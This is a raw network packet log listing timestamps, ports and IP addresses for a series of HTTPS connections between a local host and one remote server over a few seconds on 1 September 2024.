Sep 1, 2024 22:05:45.397696972 CEST	443	50087	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.424309969 CEST	50090	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.424331903 CEST	443	50090	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.563760996 CEST	443	50087	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.569426060 CEST	50087	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.569437027 CEST	443	50087	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.764858007 CEST	443	50087	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.764951944 CEST	443	50087	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.765039921 CEST	50087	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.765436888 CEST	50087	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.767241001 CEST	50091	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.767266989 CEST	443	50091	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.769467115 CEST	50091	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.773303032 CEST	50091	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.773312092 CEST	443	50091	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.776293993 CEST	50089	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.780896902 CEST	50092	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.780930996 CEST	443	50092	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.781718016 CEST	50092	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.781718016 CEST	50092	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.781755924 CEST	443	50092	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.784025908 CEST	50093	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.784049988 CEST	443	50093	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.785588980 CEST	50093	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.789311886 CEST	50093	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.789325953 CEST	443	50093	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.796411991 CEST	443	50088	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.812989950 CEST	50088	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.813011885 CEST	443	50088	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.816509008 CEST	443	50089	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.838357925 CEST	50091	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.841314077 CEST	50094	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.841353893 CEST	443	50094	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.845707893 CEST	50094	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.845707893 CEST	50094	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.845746994 CEST	443	50094	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.884510040 CEST	443	50091	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.886738062 CEST	443	50089	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.886862993 CEST	443	50089	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.889411926 CEST	50089	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.889411926 CEST	50089	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.933326006 CEST	443	50088	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.934998035 CEST	443	50090	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.937541008 CEST	50088	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.937560081 CEST	443	50088	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.953072071 CEST	50090	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.953099012 CEST	443	50090	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.076275110 CEST	443	50088	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.076368093 CEST	443	50088	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.076802969 CEST	50088	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.076821089 CEST	443	50088	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.076857090 CEST	50088	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.077415943 CEST	50088	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.077528954 CEST	50095	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.077569008 CEST	443	50095	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.077694893 CEST	50095	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.084665060 CEST	50095	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.084680080 CEST	443	50095	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.136318922 CEST	50094	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.137538910 CEST	50096	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.137588024 CEST	443	50096	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.137773037 CEST	50096	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.138592958 CEST	50096	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.138596058 CEST	50097	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.138606071 CEST	443	50096	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.138628960 CEST	443	50097	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.141549110 CEST	50097	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.158432961 CEST	50097	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.158448935 CEST	443	50097	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.165107012 CEST	443	50090	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.166162014 CEST	50090	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.166177988 CEST	443	50090	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.169785023 CEST	50096	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.171154976 CEST	50092	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.180511951 CEST	443	50094	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.212510109 CEST	443	50096	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.216507912 CEST	443	50092	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.228754997 CEST	443	50092	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.228876114 CEST	443	50092	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.229722977 CEST	50092	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.229723930 CEST	50092	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.229723930 CEST	50092	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.244129896 CEST	443	50091	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.244240046 CEST	50091	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.244240046 CEST	50091	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.294713020 CEST	443	50090	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.294800043 CEST	443	50090	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.295058966 CEST	443	50094	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.295188904 CEST	443	50094	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.295201063 CEST	50090	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.295202017 CEST	50094	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.295202017 CEST	50094	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.295315981 CEST	50094	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.295666933 CEST	50090	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.297369003 CEST	50098	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.297409058 CEST	443	50098	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.301809072 CEST	50098	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.301810026 CEST	50098	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.301846981 CEST	443	50098	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.314587116 CEST	443	50093	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.314776897 CEST	50093	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.317465067 CEST	50093	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.317471981 CEST	443	50093	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.317748070 CEST	443	50093	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.319530964 CEST	50093	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.364506960 CEST	443	50093	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.425719023 CEST	443	50093	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.431305885 CEST	50093	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.431320906 CEST	443	50093	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.553985119 CEST	443	50093	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.554050922 CEST	443	50093	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.554107904 CEST	50093	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.571787119 CEST	443	50095	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.591133118 CEST	50095	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.591165066 CEST	443	50095	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.597878933 CEST	50093	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.598882914 CEST	50099	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.598926067 CEST	443	50099	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.598990917 CEST	50099	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.599267006 CEST	50099	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.599280119 CEST	443	50099	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.607142925 CEST	443	50097	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.607218981 CEST	50097	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.608823061 CEST	50097	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.608833075 CEST	443	50097	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.609124899 CEST	443	50097	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.610507011 CEST	50097	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.610805035 CEST	443	50096	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.610860109 CEST	50096	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.610871077 CEST	50096	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.656506062 CEST	443	50097	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.723948956 CEST	443	50095	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.724200010 CEST	50095	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.724234104 CEST	443	50095	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.739764929 CEST	443	50097	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.739909887 CEST	50097	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.739922047 CEST	443	50097	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.767904043 CEST	443	50098	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.769512892 CEST	50098	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.769529104 CEST	443	50098	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.872802019 CEST	443	50095	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.872874975 CEST	443	50095	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.872932911 CEST	50095	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.873338938 CEST	50095	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.874116898 CEST	50100	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.874150038 CEST	443	50100	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.874207973 CEST	50100	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.874440908 CEST	50100	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.874453068 CEST	443	50100	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.884427071 CEST	443	50097	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.884510040 CEST	443	50097	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.884553909 CEST	50097	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.884882927 CEST	50097	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.884951115 CEST	443	50098	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.885689974 CEST	50101	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.885725021 CEST	443	50101	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.885776997 CEST	50101	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.886378050 CEST	50098	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.886384010 CEST	443	50098	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:46.894191980 CEST	50101	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:46.894206047 CEST	443	50101	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.013012886 CEST	443	50098	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.013087034 CEST	443	50098	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.013138056 CEST	50098	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.013639927 CEST	50098	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.013900042 CEST	50102	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.013928890 CEST	443	50102	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.014064074 CEST	50102	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.014200926 CEST	50102	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.014211893 CEST	443	50102	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.048070908 CEST	443	50099	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.049722910 CEST	50099	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.049747944 CEST	443	50099	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.176908970 CEST	443	50099	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.177243948 CEST	50099	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.177259922 CEST	443	50099	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.312114000 CEST	443	50099	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.312170029 CEST	443	50099	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.312237024 CEST	50099	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.312617064 CEST	50099	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.313024998 CEST	50103	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.313069105 CEST	443	50103	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.313123941 CEST	50103	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.313380003 CEST	50103	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.313393116 CEST	443	50103	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.353051901 CEST	443	50101	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.355412006 CEST	50101	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.355433941 CEST	443	50101	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.378581047 CEST	443	50100	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.386780977 CEST	50100	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.386804104 CEST	443	50100	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.488018990 CEST	443	50101	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.488177061 CEST	50101	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.488192081 CEST	443	50101	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.512161970 CEST	443	50102	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.514316082 CEST	443	50100	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.514462948 CEST	50100	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.514484882 CEST	443	50100	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.516988993 CEST	50102	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.517004013 CEST	443	50102	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.628541946 CEST	443	50101	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.628628016 CEST	443	50101	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.628741026 CEST	50101	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.629833937 CEST	50101	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.629834890 CEST	50104	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.629872084 CEST	443	50104	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.631592989 CEST	50104	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.631592989 CEST	50104	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.631620884 CEST	443	50104	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.640079021 CEST	443	50102	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.640264988 CEST	50102	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.640275002 CEST	443	50102	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.655993938 CEST	443	50100	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.656042099 CEST	443	50100	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.656359911 CEST	50100	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.656687975 CEST	50100	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.657111883 CEST	50105	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.657139063 CEST	443	50105	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.659432888 CEST	50105	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.659604073 CEST	50105	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.659615040 CEST	443	50105	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.764682055 CEST	443	50103	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.766252995 CEST	50103	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.766278028 CEST	443	50103	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.772207975 CEST	443	50102	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.772277117 CEST	443	50102	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.772604942 CEST	50102	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.772624016 CEST	443	50102	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.772665977 CEST	50102	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.772923946 CEST	50106	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.772944927 CEST	443	50106	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.772969007 CEST	50102	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.775389910 CEST	50106	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.775604963 CEST	50106	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.775613070 CEST	443	50106	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.900527954 CEST	443	50103	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:47.903314114 CEST	50103	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:47.903333902 CEST	443	50103	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.048890114 CEST	443	50103	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.048943996 CEST	443	50103	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.049102068 CEST	50103	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.049726009 CEST	50103	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.049726009 CEST	50107	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.049762964 CEST	443	50107	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.049879074 CEST	50107	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.050116062 CEST	50107	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.050123930 CEST	443	50107	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.141370058 CEST	443	50105	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.143309116 CEST	50105	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.143338919 CEST	443	50105	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.160376072 CEST	443	50104	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.265743971 CEST	443	50106	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.267314911 CEST	50106	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.267335892 CEST	443	50106	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.270416975 CEST	50104	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.276145935 CEST	443	50105	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.276361942 CEST	50105	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.276374102 CEST	443	50105	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.319317102 CEST	50104	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.319334030 CEST	443	50104	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.406191111 CEST	443	50106	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.406461954 CEST	50106	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.406476021 CEST	443	50106	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.411848068 CEST	443	50104	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.422396898 CEST	443	50105	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.422454119 CEST	50104	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.422466993 CEST	443	50104	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.422476053 CEST	443	50105	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.422555923 CEST	50105	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.423137903 CEST	50105	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.423958063 CEST	50108	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.423981905 CEST	443	50108	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.424083948 CEST	50108	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.424324036 CEST	50108	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.424334049 CEST	443	50108	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.491631031 CEST	443	50107	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.494373083 CEST	50107	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.494399071 CEST	443	50107	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.547755957 CEST	443	50106	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.547822952 CEST	443	50106	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.547863960 CEST	50106	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.548620939 CEST	50106	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.548955917 CEST	50109	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.548984051 CEST	443	50109	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.549042940 CEST	50109	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.549292088 CEST	50109	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.549303055 CEST	443	50109	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.559464931 CEST	443	50104	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.559546947 CEST	443	50104	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.559602022 CEST	50104	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.559987068 CEST	50104	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.560774088 CEST	50110	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.560785055 CEST	443	50110	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.560842037 CEST	50110	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.561023951 CEST	50110	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.561033010 CEST	443	50110	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.625612974 CEST	443	50107	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.625854015 CEST	50107	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.625869036 CEST	443	50107	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.759233952 CEST	443	50107	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.759283066 CEST	443	50107	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.759335995 CEST	50107	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.825189114 CEST	50107	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.825588942 CEST	50111	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.825623989 CEST	443	50111	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.825683117 CEST	50111	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.826143980 CEST	50111	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.826155901 CEST	443	50111	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.880559921 CEST	443	50108	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.882978916 CEST	50108	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:48.883004904 CEST	443	50108	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:48.996301889 CEST	443	50109	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:49.002340078 CEST	50109	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:49.002366066 CEST	443	50109	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:49.010368109 CEST	443	50110	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:49.015235901 CEST	443	50108	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:49.015391111 CEST	50108	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:49.015400887 CEST	443	50108	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:49.045306921 CEST	50110	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:49.045325994 CEST	443	50110	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:49.131598949 CEST	443	50109	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:49.131748915 CEST	50109	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:49.131757975 CEST	443	50109	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:49.145840883 CEST	443	50110	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:49.145965099 CEST	50110	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:49.145976067 CEST	443	50110	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:49.155724049 CEST	443	50108	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:49.155777931 CEST	443	50108	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:49.155827045 CEST	50108	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:49.156182051 CEST	50108	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:49.156910896 CEST	50112	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:49.156943083 CEST	443	50112	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:49.157005072 CEST	50112	443	192.168.2.5	198.185.159.177
